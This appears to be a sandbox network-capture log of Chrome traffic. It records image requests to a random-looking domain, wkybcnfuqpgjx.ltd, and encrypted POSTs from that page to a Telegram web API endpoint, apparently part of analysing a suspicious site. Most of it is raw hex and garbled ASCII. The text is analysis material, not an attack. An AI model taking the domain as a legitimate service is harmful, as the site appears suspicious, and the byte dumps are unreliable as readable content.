                                  Data Ascii: cV-+astXX[k::S@-[Fmha8cg%'-VO! Xz]y1F\Nqo{_kcmR`-w{1{jy<hr=%vPmO1L8#pN%cK{0LOO2 HC@;;V]sq(a'A
                                  2025-01-12 00:04:01 UTC701INData Raw: 14 a2 15 1a ad 50 68 41 5d c7 ea 39 3b 09 ca 45 d1 56 e0 80 6c 30 8d 23 0c d0 86 be d1 e8 38 2a 85 41 2b 03 1a 32 01 e5 15 ab 39 e5 b5 05 f6 06 6a b7 2e 94 a0 7c 50 1e 91 10 d6 97 c4 bf 4b 93 20 68 40 2b 20 81 14 12 b4 81 1c b4 06 32 48 b8 a9 03 e6 56 3b 09 41 fc be c0 de 66 ec 26 be 04 14 fe 06 e9 d7 6c 9a 68 5b a1 61 88 5f a4 9a 84 24 8d ea 55 1f 15 dd dc 7a 87 d2 39 c9 56 a0 04 94 8f fb 55 a9 f2 fd 08 f1 ab 83 55 1e 81 40 9f e8 75 9a 86 9e 46 9e 90 91 c1 34 30 81 68 ec 20 e2 e0 8c 8e ea 32 6d 41 17 6c 05 86 1b 4e 58 ae b1 84 e1 11 f6 30 24 6e 6b b6 7e 6a 51 46 a4 71 40 1e c7 63 80 82 d8 42 04 35 f6 a8 ab 38 2b af 52 87 2e b3 8d c0 04 90 1b 61 34 04 58 17 4a 7f 02 7d 0a 07 90 c2 fa d8 16 fb c5 d0 32 a2 8c 1c 22 0e 03 fc 19 c4 3e 5f f9 b1 9d b6 be 46 7e
                                  Data Ascii: PhA]9;EVl0#8*A+29j.|PK h@+ 2HV;Af&lh[a_$Uz9VUU@uF40h 2mAlNX0$nk~jQFq@cB58+R.a4XJ}2">_F~


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  100192.168.2.650014172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC370OUTGET /img-apple-160/1f1e6-1f1e9.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC905INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:01 GMT
                                  Content-Type: image/png
                                  Content-Length: 4963
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1363"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 2
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2FzSSxS57TKs4%2BgEbZcBGn2%2Fj9JzJqKwY%2BnhvNf0sVqKTU7J8ppEVTP2tiSnz%2Bs2shkPJAEsM8R%2BzWr9gmWMIXFMgvH93N5%2ByiQBgrGz25vTz1SO8fUJdw9btSBg0ZFdoOokLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3024a937cfa-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1798&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=1569892&cwnd=190&unsent_bytes=0&cid=9080463c1f340a91&ts=154&x=0"
                                  2025-01-12 00:04:01 UTC464INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 81 5e 45 cb c1 6d 7f 5d 54 66 17 24 89 6f 54 42 19 31 cf c1 6c a0 70 7f 82 72 13 53 16 28 83 77 12 bb 68 6f 6b 6e 8e 9b 27 2f cf c2 6c 17 1b 3f bd 6c 72 82 75 12 71 16 1c 1a 1e 4a ce c1 6c 74 78 96 cf c3 6c bc 6e 73 6d 12 19 4e 53 77 81 74 13 1a 1e 41 ce c2 6e 73 77 95 cf c3 6c 19 1d 42 73 76 96 77 1a 20 bd 6c 72 19 1d 41 83 76 13 cd c2 6b 6f 14 1a 73 76 95 ce c3 6c 73 17 1e 49 4d 74 fe f4 df fe f8 9a ff ff 2c f9 d5 d4 fc f6 1b ff f2 1c ff ee 1c f6 f1 1c ff ef 0a ff ea 1b ff ec 0a ff e7 21 f5 e7 2f fe e4 24 ff e5 13 fc e2 25 eb e7 34 fc e2 16 fa e0 25 e6 d1 a0 fa df 22 f9 df 24 f8 de 24 f6 de 28 f5 dd 2f fa de 19 f8 dd 23 f6
                                  Data Ascii: PNGIHDRPLTEGpL^Em]Tf$oTB1lprS(whokn'/l?lruqJltxlnsmNSwtAnswlBsvw lrAvkosvlsIMt,!/$%4%"$$(/#
                                  2025-01-12 00:04:01 UTC1369INData Raw: a9 9c 43 cf 82 63 ac 91 70 a9 8f 80 af 9d 17 aa 8d 6b e5 79 37 a9 96 18 a5 86 64 e5 6d 37 d6 69 5f c0 6f 74 9e 8d 16 df 60 3b ba 68 6d 9a 76 66 cd 5c 58 94 84 16 b8 5f 66 de 54 3a d0 4f 56 70 74 93 8a 7d 14 b2 59 60 bc 53 5a d8 43 42 84 76 13 66 6b 8d be 48 51 e5 35 43 db 3a 37 cc 3e 48 e2 33 40 e0 31 3e 5d 63 8c df 2f 3c dc 30 3c e4 27 47 d2 31 41 bc 3b 46 dc 2d 39 59 5e 86 da 2b 37 d7 2a 37 d7 28 36 d2 2a 37 d0 2b 37 d6 27 33 ca 2c 37 52 58 87 d3 26 33 d0 27 32 71 5a 1f d3 24 31 c1 2c 36 cf 24 30 ca 24 30 cf 21 2e cc 21 2e ca 20 2c 49 50 86 c2 23 2e cc 1d 2a af 2a 33 c8 1d 29 b6 24 30 c9 1b 28 c6 1b 28 c7 19 26 c4 19 26 42 48 82 c1 19 25 9f 26 2f b6 1a 25 3c 44 88 3b 43 86 3e 43 76 3a 42 84 39 41 84 98 21 2a a9 19 24 38 3f 82 36 3e 81 35 3d 7f 34 3c 7e
                                  Data Ascii: Ccpky7dm7i_ot`;hmvf\X_fT:OVpt}Y`SZCBvfkHQ5C:7>H3@1>]c/<0<'G1A;F-9Y^+7*7(6*7+7'3,7RX&3'2qZ$1,6$0$0!.!. ,IP#.**3)$0((&&BH%&/%<D;C>Cv:B9A!*$8?6>5=4<~
                                  2025-01-12 00:04:01 UTC1369INData Raw: 5c 6a c4 57 69 15 d6 05 8e b7 c4 1a 4e cb 72 52 06 2c e0 c1 1a 63 ad 33 b0 4c 58 49 d0 98 a5 6e 16 b7 6f ee 2c 06 d9 41 9c 92 3a 10 b8 20 50 41 32 48 44 57 ef 55 81 08 49 84 3e d3 ee cf 9b 8e b4 7f f9 fa db 77 de dc ec a0 99 c7 18 75 9e 89 24 54 40 94 43 b7 80 72 6a 9e 73 a4 c8 d1 45 aa ac 5e c2 cc 37 5f 31 ba bb e7 5e ba fa 7a f5 57 71 75 37 1c 0c 04 a8 ff fc 39 94 09 a7 89 13 32 8a b9 30 50 20 22 64 54 52 81 65 11 12 c2 50 bc f4 ea 8d ea c1 f6 83 f0 f2 8b 7b 3f 85 5b d0 5c 7b c7 31 d9 6f 3f d8 fa b1 0b 9c 98 f8 0b 3f 62 90 f5 7f 51 24 b2 9a 6a b3 b9 d3 fe ce e6 5b b7 83 dd a3 6e bb 54 df da 8c f1 e1 ec e1 1f b7 3f 94 c4 29 3b 89 82 5e 10 98 9d a7 6d 70 aa 8b 16 5c 31 79 fc 03 97 1e fe a6 bb d3 7f 89 31 bb df b6 ad 33 8c 3f e4 e1 11 8f 44 7d 50 94 25 2b
                                  Data Ascii: \jWiNrR,c3LXIno,A: PA2HDWUI>wu$T@CrjsE^7_1^zWqu7920P "dTReP{?[\{1o??bQ$j[nT?);^mp\1y13?D}P%+
                                  2025-01-12 00:04:01 UTC1369INData Raw: c7 21 cd 86 2e 74 50 b5 bd 71 dd e8 13 a0 5f c3 c8 08 c2 51 f7 1c ce 83 92 f5 8d b1 b1 de 07 c1 34 ee ea 2f fe d5 ba b3 98 c1 ab 14 93 b4 06 c2 06 5d 7a 0e 02 11 1e 03 a0 2e 66 b9 be aa 79 a1 be e4 bc 4a 71 1e b5 08 96 2b b5 e8 79 0c 6a ce f1 ba c2 bc 4a b1 02 0c 08 25 32 86 f5 08 f4 e7 4b 84 9f 87 c0 20 ba 94 18 10 86 59 1e 97 bb ed ed 6d 6b 14 89 b0 64 bb 54 44 02 e1 e2 79 84 c4 48 ff ee 97 94 28 63 07 d3 10 bf de da fe e2 49 f7 3f b8 a8 c4 d9 68 c2 e1 40 75 e7 fd f2 fc 1e 74 94 ab 32 ec c4 16 64 4c c3 85 6a 52 12 e5 0e 93 b5 0b df 16 95 76 67 01 b0 c9 d9 57 70 98 9f 98 7a 36 0e 08 b3 97 ce f9 a5 be 55 4c 13 9e 5b 19 15 cd 4a 85 12 99 98 22 de 82 70 f2 29 56 b4 09 b5 ed bc db a0 78 c5 24 e4 05 00 90 89 85 c2 90 f2 80 c2 76 0a da a4 0d 09 9a 75 10 c2 0c
                                  Data Ascii: !.tPq_Q4/]z.fyJq+yjJ%2K YmkdTDyH(cI?h@ut2dLjRvgWpz6UL[J"p)Vx$vu
                                  2025-01-12 00:04:01 UTC392INData Raw: 68 a7 2b b5 26 b6 23 b9 5a ad 39 63 d7 5d 61 be 28 ad f5 00 04 90 89 c1 24 a4 4c f4 1d a2 e4 68 c6 da 04 25 28 af 9d 40 50 9e 46 af 6b be 27 d6 18 c0 40 13 1b d1 ad 51 fb 94 03 e6 14 be 74 01 68 b7 ca 82 8a 47 e6 bc 19 e5 c9 3d 52 76 b9 35 63 b4 52 30 1a e2 2a 33 85 5f dd 8b 12 94 00 03 a8 cd 18 b2 2a b6 a8 36 9f 5b ef 36 ff 46 b7 96 17 47 81 4e 27 f7 2e ef 5e 5f 7d d7 be f0 17 78 3c 01 1c 81 e0 f1 21 04 3c 16 4f 08 d5 62 ec 43 b5 f5 d9 8d 77 01 86 44 b5 55 b1 1d f0 b7 5f 38 5e 17 c9 a7 f9 e0 3a 97 5e ac 16 a4 32 aa 1d 09 de 52 51 80 a5 61 eb da 8d 8b 90 02 b5 5a 74 33 d6 54 6e f3 62 61 03 6f 4c ba 35 7d ba 2c 28 d3 e7 00 b5 23 1e 71 38 80 50 cb 95 44 92 f4 f3 9f ce 93 a2 69 d4 a0 2e e9 c2 71 72 24 2c 09 42 3a 19 ff 06 51 29 04 02 44 d1 e5 03 d3 6b 4f 06
                                  Data Ascii: h+&#Z9c]a($Lh%(@PFk'@QthG=Rv5cR0*3_*6[6FGN'.^_}x<!<ObCwDU_8^:^2RQaZt3TnbaoL5},(#q8PDi.qr$,B:Q)DkO


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  101192.168.2.650013149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:01 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:01 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:04:01 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  102192.168.2.650017149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:01 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 88
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC88OUTData Raw: 2a 10 06 78 25 cb 00 4d 67 09 12 0b bf 56 da c0 48 0e d1 1c 0d 7d a8 87 0a 0d 0c 8a f1 9c f0 74 fd a3 e1 32 d4 73 af e9 ef 27 ad 0d a8 af c0 53 8b cf e8 a6 91 ab 3a 09 c2 84 82 c8 47 40 a6 2a 78 a1 b2 28 50 26 dd 02 7a 54 d9 6d e5 98 32 67 cf 7e 19 ca 2d 25 c2 af
                                  Data Ascii: *x%MgVH}t2s'S:G@*x(P&zTm2g~-%
                                  2025-01-12 00:04:01 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:01 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 584
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:01 UTC584INData Raw: 2a 10 06 78 25 cb 00 4d a5 bf 8e 04 ef ab 01 2e 3b 54 70 65 65 dc 00 60 90 1f 59 00 69 ec 7c 8e bd 0d 78 46 7c 1f 6a 5f ed 01 82 8b d7 0a 82 c8 bc fd 6e f6 ff c4 17 27 7c 12 66 14 dd 28 43 d5 92 2c c5 36 1e 06 b0 a0 3f bc 28 81 d2 b7 ac 5e 9d 6a e0 d4 97 25 65 87 28 66 d3 cd 65 4f cd 67 e7 c5 2e 8a 19 03 41 e2 33 2a ab b7 46 40 e5 d3 a9 ca 1b 00 53 bc f9 97 4c dd c5 48 8d 47 27 16 a0 11 22 db d0 cf c2 3f df a9 28 0c 79 05 6e 1d f8 24 c8 ee b6 94 0a 2e ee fa 93 c6 13 a6 57 e3 92 a0 1a 0a 5e 7f 83 6a b2 1d 59 0c 91 06 c0 e0 37 f8 32 8f 62 61 9d 15 6b d2 68 3c ab 84 e9 01 b7 4b 57 eb c8 d5 a1 f2 fd c5 0a 4e 1e c2 ab 3c 1c b3 45 95 45 cd 94 d6 dc 43 30 38 4b b1 f1 37 63 8a 9c 44 08 78 ca 4b 74 bc 98 94 a4 b0 1f 8a 7e cf ea d7 c9 93 67 7e 45 d3 13 44 5d 09 3b
                                  Data Ascii: *x%M.;Tpee`Yi|xF|j_n'|f(C,6?(^j%e(feOg.A3*F@SLHG'"?(yn$.W^jY72bakh<KWN<EEC08K7cDxKt~g~ED];


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  103192.168.2.650018149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:01 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 216
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC216OUTData Raw: 2a 10 06 78 25 cb 00 4d 76 6c ff 52 93 33 3f fe cc 94 cd 7f e1 00 7a c1 06 83 3c 34 7f d4 1d dc 14 01 c9 a6 a0 d3 a2 c4 1c 4f 01 b9 c8 87 d2 c9 87 46 e5 df 59 3e 56 4f 99 c7 6a 61 f1 33 81 b3 bc 5d 50 1f bd 13 dd 98 de 18 e2 75 ae 1f 50 9e 17 64 ef db 94 f6 95 59 e7 d6 0a 2d 24 2b c9 87 42 64 2a 25 c0 49 57 97 83 ed aa ac a6 12 7b 46 0d a8 ee 94 32 7a 4d b0 4d 1f 90 d9 ee 0d 90 58 a0 62 b3 cd 8d 7e f0 97 1c ed b2 ae 5a 09 18 f0 a6 79 d6 5b 1f 42 45 c2 72 e7 d8 65 32 90 dc 1d 34 d9 73 10 e5 4e 2d 2d eb ef f9 ab 5c b0 61 93 d7 23 5d 66 a9 43 fd 0d 92 2e 9d 7b 9b 85 37 b9 21 97 6e 1f f9 df cf cf a2 06 4f ed 84 5e 4c 07 0a c1 8e 02 50 6c 7b ad
                                  Data Ascii: *x%MvlR3?z<4OFY>VOja3]PuPdY-$+Bd*%IW{F2zMMXb~Zy[BEre24sN--\a#]fC.{7!nO^LPl{
                                  2025-01-12 00:04:01 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:01 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 584
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:01 UTC584INData Raw: 2a 10 06 78 25 cb 00 4d dc 0c 95 a3 86 6d ad 2b 07 20 43 78 8c 00 2e ef b1 9f e4 ea 37 6f a6 48 ca bd f5 8d 2c 8c 90 7d 4b 96 a7 a8 12 1b 3c c0 b2 78 db 38 6e 5a 7f 0c b2 88 bd 33 e4 aa 84 93 7b ed 3c a1 6a 22 95 35 f3 ea e2 e2 22 b1 2b d5 7d a0 af d3 7d c5 d1 6b d3 a1 42 85 e9 f0 0f 1a 7b 5f 5e 2e 56 c3 f7 ac e6 f4 af 87 99 3c b1 7c 92 98 ff 30 83 b3 da 62 85 de 5c 6b d3 42 98 ab 0f 0f 80 69 92 66 2b c0 6f 6c 19 14 80 73 dd c9 06 1c 41 38 51 d1 11 81 af 88 b0 e8 b6 f9 ac f1 d0 9a 01 5b 14 48 85 4b fa 7b 49 a0 40 5b 3e 2a 33 16 92 0e a0 e0 62 16 ea f8 4c 50 5a 4e 34 2f f0 8e fb 12 3d f7 85 2c bc b1 e3 a4 2a 52 d5 51 ab 82 4a f2 50 b3 cb a2 dc 98 c0 0a 14 91 bc 57 15 48 88 d8 c9 fb 02 60 38 c3 3a ee a9 5b 75 f1 99 ea dc a2 51 8f 6f b2 7e 98 b5 c6 29 a3 63
                                  Data Ascii: *x%Mm+ Cx.7oH,}K<x8nZ3{<j"5"+}}kB{_^.V<|0b\kBif+olsA8Q[HK{I@[>*3bLPZN4/=,*RQJPWH`8:[uQo~)c


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  104192.168.2.650021172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:01 UTC608OUTGET /img-apple-160/1f1e6-1f1fc.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC902INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: image/png
                                  Content-Length: 5061
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-13c5"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNb%2FPrj1iN0XMTYNLdRI8LABZ9MtZFtUsmif%2F2SUwOyU3ZWWW3x0ACoHOwGTVq8NSsqk8F%2F9DF6Lx4I6kIecTtX0w3z2OOYwh2zxNe4CZ6OAPyCv%2FY%2Fsvj6Y5SpC3GyS2iaxLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3056ef942cd-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1777&rtt_var=672&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1643218&cwnd=242&unsent_bytes=0&cid=3657539c6467baaf&ts=653&x=0"
                                  2025-01-12 00:04:02 UTC467INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 31 43 5d 84 95 ab 34 46 60 81 92 a9 31 44 5e 8d 9d b3 80 90 a6 32 44 5d 7f 90 a7 33 45 5f ac 93 1b 4b 62 80 3f 57 7d 8c 9c b2 31 44 5e 7e 8e a5 2f 41 5b 92 7c 07 63 63 36 31 49 69 83 93 a9 31 45 5e 56 6a 86 8b 9b b2 33 45 5e 89 99 af 7f 8f a6 33 45 5e 8c 9c b2 30 43 5c 82 93 a9 36 48 62 89 99 af 2a 3c 55 8d 9e b4 7f 90 a5 38 4b 64 2b 3d 57 eb ea e6 ff e3 23 ff e0 27 fc dc 30 ff dc 20 d4 ce d3 f6 d8 36 f9 d7 27 fd d7 1b ed d3 3e f7 d2 17 f0 d1 29 e2 bc b9 e2 ce 49 f0 cd 18 ac c7 da d8 c8 53 ef c8 0d e7 c7 1e de c6 37 e9 c4 0b cb c2 60 b6 b7 c2 e1 c1 19 d5 a8 aa e4 bf 07 cc bd 47 be bb 6b d9 bb 16 df ba 05 96 b7 cf b4 b6 79 e1
                                  Data Ascii: PNGIHDRPLTEGpL1C]4F`1D^2D]3E_Kb?W}1D^~/A[|cc61Ii1E^Vj3E^3E^0C\6Hb*<U8Kd+=W#'0 6'>)IS7`Gky
                                  2025-01-12 00:04:02 UTC1369INData Raw: 5c 88 d5 96 8a 31 66 88 b7 64 88 ba 63 87 b7 83 88 5d 6c 85 a6 70 87 90 63 86 b6 66 85 b0 6f 83 9e 61 85 b6 e4 56 4f 57 84 d2 61 84 b4 60 84 b5 a1 86 00 76 85 73 59 83 c9 5f 83 b3 62 82 ad 69 80 a1 5e 82 b2 5a 81 bc 61 80 a9 53 85 b3 6c 81 86 5d 80 b0 5c 7f af 52 7e ca 5b 7e ae 54 7d be 61 7c a0 65 7c 95 97 7f 01 59 7d ad 5d 7c a6 94 7e 09 59 7c ab 58 7b ab 59 7a a8 57 7a ab 65 7a 7e 58 79 a3 56 79 a8 55 79 aa 59 77 9f 54 77 a7 5e 76 90 de 44 41 4b 76 c1 54 76 a4 52 76 a6 51 75 a5 55 74 9c 51 74 a4 48 73 bb 4f 73 a3 4f 72 a0 55 71 95 4e 72 a2 76 72 34 4e 71 a0 50 70 9b 4c 70 a0 4c 6f 9f 42 6e bb 45 6e b0 4b 6e 9f 52 6d 90 4b 6e 9d 47 6e a6 de 37 33 4a 6d 9d 49 6c 9c 4a 6c 99 48 6b 9a 4e 6a 8e 43 6a a3 47 6a 97 3d 68 b2 46 68 94 47 66 90 4c 65 86 60 66 46
                                  Data Ascii: \1fdc]lpcfoaVOWa`vsY_bi^ZaSl]\R~[~T}a|e|Y}]|~Y|X{YzWzez~XyVyUyYwTw^vDAKvTvRvQuUtQtHsOsOrUqNrvr4NqPpLpLoBnEnKnRmKnGn73JmIlJlHkNjCjGj=hFhGfLe`fF
                                  2025-01-12 00:04:02 UTC1369INData Raw: 0c 8b 48 cd 41 de 46 0f c1 44 a1 25 18 3a 35 10 38 3e 41 22 01 4e ee 15 af 54 77 77 3f 5b 0f a0 38 44 c4 fb 78 20 cc 87 e8 a3 0f 40 4f 3d 31 44 a1 15 8f 4c b0 3f 47 e7 2f e5 cb 37 f4 37 9f 6c 09 0c 2e 2d 08 3e 10 10 1a 12 87 6f 85 e6 90 1a 03 88 86 08 0a 8e 05 26 c1 84 b3 5f 77 77 2b bf 98 ff 62 5d 0d 41 22 ad 90 2e 8f 5c a9 89 f4 84 23 51 8a 01 9e 01 f6 1f 76 cd 2d 44 ae bb 8e e3 df ff e5 5c e6 cc 99 9d dd 9d bd 24 62 9b a4 dd 6a 7c 68 4c 5b 82 6d 2d b6 4a 1e 42 22 09 28 28 94 12 68 15 ed 5b 9e 45 21 88 88 55 04 1f 54 48 a5 0f 6a d1 27 7d a8 36 50 c4 07 0b 09 22 62 a2 d6 d4 c6 6e 62 b3 c9 de b2 97 99 dd 73 66 ce e5 7f d3 73 ce b0 43 37 67 a7 9b 98 25 2b ec f7 e9 70 7e 9c ff 7c f8 5d be ff 99 39 ff f5 25 a7 f9 ad e4 25 fa 68 8c e4 d8 ab 70 05 91 c5 aa 19
                                  Data Ascii: HAFD%:58>A"NTww?[8Dx @O=1DL?G/77l.->o&_ww+b]A".\#Qv-D\$bj|hL[m-JB"((h[E!UTHj'}6P"bnbsfsC7g%+p~|]9%%hp
                                  2025-01-12 00:04:02 UTC1369INData Raw: 0e ce 00 d0 9c ac 52 18 75 15 a8 21 a8 f6 3a 47 a8 58 a4 d6 33 47 83 e9 05 39 57 0a 88 d1 cb e7 43 97 8f 1d da 53 1f 02 10 24 6b 69 24 4c a0 10 93 a8 54 ec e2 48 ec ec bf f4 72 14 88 24 35 86 10 58 ca fc 57 79 49 07 aa e3 c3 08 91 4e 11 74 3f 82 53 10 67 a4 0a 00 b4 bd 3a e9 03 40 03 c0 d8 52 dd f2 f2 db 6d 2a b3 60 1a b6 9c 87 c7 4c f4 e3 92 17 3e 8d 37 a6 ff 78 45 22 04 32 4f 3a 54 19 d9 2d 01 d3 3d 52 86 14 b9 96 10 c7 0b 8b ad 28 90 b1 49 62 a9 a0 29 83 51 c6 10 64 6c be 3b 36 ec 23 4c 91 48 e4 32 b9 51 d7 02 0d 33 17 e8 28 60 49 04 05 61 21 13 65 96 ab 1c 52 f1 f1 b1 87 86 1a 55 44 41 12 24 60 d5 f1 9a b5 37 b8 15 70 64 26 79 e7 dc 9b 21 38 20 25 c0 3c b8 15 31 5a 43 15 75 60 05 c0 75 20 0c b3 ad 20 36 1a 90 dc e4 73 a2 14 21 b6 53 75 2a 43 b5 9c 2d
                                  Data Ascii: Ru!:GX3G9WCS$ki$LTHr$5XWyINt?Sg:@Rm*`L>7xE"2O:T-=R(Ib)Qdl;6#LH2Q3(`Ia!eRUDA$`7pd&y!8 %<1ZCu`u 6s!Su*C-
